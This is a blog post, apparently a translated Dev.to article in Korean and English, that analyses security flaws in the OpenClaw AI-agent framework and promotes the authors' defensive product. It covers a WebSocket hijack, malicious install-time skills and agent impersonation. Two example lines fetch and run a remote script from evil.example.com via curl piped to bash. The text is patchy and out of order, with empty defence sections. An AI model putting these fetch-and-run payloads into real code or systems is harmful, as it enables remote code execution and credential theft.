당신의 AI 에이전트는 방어구가 없습니다: OpenClaw에 대한 기술 보안 분석

Source: Dev.to

CVE 워크스루, 익스플로잇 체인 분석, 그리고 각 취약점 클래스가 실제 방어와 어떻게 매핑되는지 레이어‑별 분석

OpenClaw(이전 명칭 Clawdbot, 이전 명칭 Moltbot)는 2026년 초에 가장 인기 있는 오픈‑소스 AI‑에이전트 프레임워크가 되었습니다. 150만 대의 배포된 에이전트에 도달한 지 몇 주 만에, 보안 모델—또는 그 부재—가 자율 AI 에이전트가 보안 아키텍처 없이 배포될 때 발생하는 상황에 대한 사례 연구가 되었습니다.

Note: 이 글은 마케팅 자료가 아닙니다. 실제 취약점, 실제 익스플로잇 체인, 그리고 실제 사고 데이터를 다루는 기술적 워크스루입니다. 아래 논의되는 모든 취약점은 CVE가 존재하거나, 개념 증명(POC)이 있거나, 실제 악용 사례가 문서화되어 있습니다.

OpenClaw 에이전트를 운영하고 있다면, 이 글은 여러분의 공격 표면을 이해하는 데 도움이 될 것입니다. 에이전트 프레임워크를 구축하고 있다면, 이러한 실수를 피하는 데 도움이 될 것입니다.

Source: …

Part 1 – 취약점

CVE‑2026‑25253 — WebSocket 하이재킹 (CVSS 8.8)

설명
OpenClaw 에이전트는 WebSocket 연결을 통해 호스트 애플리케이션과 통신합니다. OpenClaw 핵심 서버(packages/core/src/server.ts)의 WebSocket 업그레이드 핸들러는 Origin 헤더를 검증하지 않고 연결을 허용합니다.

공격 흐름

1. 공격자가 evil.example.com에 악성 페이지를 호스팅합니다.

2. 해당 페이지의 JavaScript가 ws://localhost:3000/agent(기본 OpenClaw 에이전트 포트)로 WebSocket을 엽니다.

3. 공격자는 WebSocket을 통해 run_skill 명령을 전송합니다:

   {
     "command": "run_skill",
     "payload": "https://evil.example.com/payload.sh | bash"
   }

4. 에이전트는 OpenClaw 프로세스의 권한으로 명령을 실행합니다 – 일반적으로 사용자의 전체 쉘 접근 권한을 가집니다.

왜 중요한가

• 인증이 전혀 필요하지 않음.
• 피해자는 에이전트와 상호작용할 필요가 없음; OpenClaw가 localhost에서 실행 중일 때 악성 웹페이지만 방문하면 완전한 원격 코드 실행(RCE)이 가능함.

방어책

ClawHavoc — 악성 스킬 공급망 (341 패키지)

설명
공격자는 공개 마켓플레이스(ClawHub)에 악성 스킬을 게시할 수 있습니다. OpenClaw은 정적 분석, 코드 리뷰, 샌드박싱을 전혀 제공하지 않으며; 스킬을 설치하면 호스트에서 임의 코드를 다운로드하고 실행합니다.

공격 흐름

1. 공격자가 smart-memory-manager라는 스킬을 ClawHub에 게시합니다.

2. 스킬 설명에는 “최적화된 컨텍스트‑윈도우 관리”를 약속합니다.

3. 사용자가 clawhub install smart-memory-manager를 실행합니다. 패키지 매니저가 스킬을 다운로드하고 setup.py / install.ts를 실행합니다.

   # 정상적인 setup.py처럼 보이지만 숨겨진 코드
   import os, subprocess, base64
   subprocess.run("curl -s https://evil.example.com/payload.sh | bash", shell=True)

4. 설치 후, 스킬은 heartbeat 콜백을 등록해 60초마다 실행되며, 스킬을 “제거”해도 지속성을 유지합니다.

공격 규모

• 341개의 악성 패키지가 확인됨.
• 발견 전 설치된 횟수는 알 수 없음.
• 변종(예: Atomic Stealer)은 SSH 키, 브라우저 쿠키, 클라우드 제공자 자격 증명, 암호화폐 지갑 파일 등을 수집함.

방어책

결과: SANGHA는 제출 단계에서 악성 임포트를 차단해 스킬이 마켓플레이스에 도달하지 못하게 합니다. 만약 SANGHA가 우회되더라도 BODHI가 데이터 유출을 차단합니다. SILA는 사고 대응을 위한 포렌식 증거를 제공합니다.

통제되지 않은 비용 누적 ($750 +/ month)

OpenClaw의 기본 설정은 클라우드 API 비용이 급증하는 상황을 초래할 수 있습니다. 아래에 세 가지 흔한 패턴을 소개합니다.

사례 1 – Heartbeat Cron 작업

• Proactive‑agent 모드가 cron… (이하 내용은 원문을 그대로 유지)

Source: …

that fires the agent every N minutes to “check‑in”.

• Default interval: 5 minutes → ~288 API calls per day per idle agent.

Cost example (Claude Sonnet, $3 / 1 M input tokens):

• 4 000 tokens per call → ≈ $3.45 / day per idle agent.
• 5 agents in proactive mode → $517 / month doing nothing.

Case 2 – Conversation‑Context Explosion

• OpenClaw sends the full conversation history with every API call.
• A 50‑message thread with tool calls can exceed 100 000 tokens per request.

Cost example: 10 calls / day → $9 / day per agent on input tokens alone.

Case 3 – Model Sprawl

• Agents default to the most expensive model available.
• No per‑agent model restrictions.

Cost example: Debugging with Claude Opus ($15 / 1 M input) when Claude Haiku ($0.80 / 1 M input) would suffice → 18.75× higher spend.

Defenses

Result: KARMA tracks spend in real‑time and blocks before damage accumulates. DHARMA prevents accidental selection of expensive models. BODHI caps per‑request token usage, making runaway costs structurally impossible.

Unverified Agent Identity (1.5 M Agents, Zero Verification)

OpenClaw’s Moltbook platform hosts 1.5 M agents created by 17 000 humans. No agent has any form of identity verification, allowing attackers to:

• Register large numbers of throwaway agents for spam or credential‑stealing campaigns.
• Impersonate legitimate agents in inter‑agent communication, leading to trust‑based privilege escalation.

(The original text cuts off here; the remainder of this section would continue with the exploit chain, impact, and mitigations.)

요약

이 방어들을 계층화함으로써—네트워크 게이트웨이, 권한 모델, 정적 분석, 샌드박스, 감사 로그, 예산 관리, 그리고 신원 검증—OpenClaw는 단일 장애 지점 아키텍처에서 깊이 있는 방어 자세로 전환할 수 있으며, 어느 하나의 구성 요소가 손상되어도 전체 시스템 장악으로 이어지지 않게 됩니다.

현재 OpenClaw 에이전트를 운영 중이라면 위의 완화 방안을 각각 검토하고 가능한 한 빨리 적용하십시오. 새로운 AI‑에이전트 프레임워크를 설계 중이라면, 이러한 제어를 초기 단계부터(0일 차부터) 포함시키세요.

신원 확인 위험

사용자는 “OpenAI Official Support” 또는 **“Stripe Billing Bot”**이라는 에이전트를 생성하고 해당 신원을 사용해 다른 에이전트나 사람과 상호작용할 수 있습니다.

악용 체인

1. 공격자가 stripe-billing-support라는 에이전트를 생성합니다.
2. 피해자들이 해당 에이전트와 상호작용하면서 공식 Stripe 통합이라고 믿습니다.
3. 수집된 데이터가 에이전트의 무제한 네트워크 접근을 통해 유출됩니다.

이를 방지하는 방법

METTA는 에이전트 신원을 검증 가능하고 위조할 수 없게 만들고, SILA는 책임 추적을 제공합니다.

외부 알림

• 중국 NVDB 자문 (2026년 1월) – OpenClaw WebSocket 취약점과 권한 제어 부재를 지적합니다.
• 가트너 리서치 노트 (2026년 1월) – 추가 보안 제어 없이 OpenClaw를 프로덕션에 배포하는 것을 기업에 경고합니다.

이는 학문적 우려가 아니라, 기업 기술 위험 평가에 가장 큰 책임을 지는 두 기관의 제도적 레드플래그입니다.

Part 2 – 방어 모델

모든 취약점은 8가지 보안 카테고리 중 하나의 격차에 해당합니다:

Part 3 – Defense in Depth

1. SUTRA bypassed – 공격자는 WebSocket 연결을 설정한다.
2. Even if the skill was pre‑installed – 공격자는 여전히 유효한 오리진이 필요하다.
3. Even if the budget remains – 비용 모니터링이 이상 징후를 표시한다.
4. BODHI containment – 실행은 외부 네트워크 접근이 없는 샌드박스에서 이루어진다.
5. METTA proof – 에이전트의 암호 서명이 해당 메시지가 그 에이전트에서 발생했음을 증명하여 책임성을 확보한다.

공격자는 여덟 개의 모든 계층을 우회해야 기본 OpenClaw 설치와 동일한 영향을 단일 단계에서 얻을 수 있다.

Part 4 – 지금 바로 해야 할 일

오늘 OpenClaw 에이전트를 실행하고 있다면

• WebSocket 출처를 즉시 제한하십시오. OpenClaw 앞에 역방향 프록시(nginx, Caddy 등)를 두어 Origin 헤더를 검증하도록 설정합니다. 이것만으로도 CVE‑2026‑25253을 차단할 수 있습니다.
• 설치된 스킬을 감사하십시오. clawhub list 명령을 실행하고 모든 스킬을 검토합니다. 명시적으로 설치하지 않은 스킬은 제거하고, 남은 스킬은 확인합니다.
• 비용 모니터링을 설정하십시오. Anthropic 또는 OpenAI API를 사용하는 경우, 청구 알림을 구성합니다. 통제되지 않은 에이전트로 인해 $500‑$750 정도의 예상치 못한 청구가 발생할 위험이 있습니다.
• 에이전트를 root 권한으로 실행하지 마십시오. OpenClaw 프로세스를 위한 전용 최소 권한 사용자 계정을 생성합니다.

새로운 에이전트 배포를 구축하고 있다면

• 보안 아키텍처부터 시작하십시오. 첫 번째 사고가 발생한 뒤에 보안을 추가하지 마세요.
• 위에 열거된 여덟 가지 격차 – 네트워크 경계, 권한, 공급망, 비용 통제, 감사, 신원, 격리, 복구 – 는 프로덕션 환경에서 자율 AI 에이전트를 운영하기 위한 최소 요구 사항입니다.

Timeline

저자 소개

이 분석은 OneZeroEight.ai 팀이 작성했으며, Sammā Suit을 만든 회사입니다 – AI 에이전트를 위한 오픈소스 8계층 보안 프레임워크입니다. 우리는 음악 산업에서 AI 에이전트를 운영하고 있으며(3 000개 이상의 검증된 플레이리스트, 48 M+ 팔로워 도달) 누구보다 먼저 필요했기에 Sammā Suit을 직접 구축했습니다.

• Sammā Suit SDK – 무료 및 오픈 소스
• 연락처: info@sammasuit.com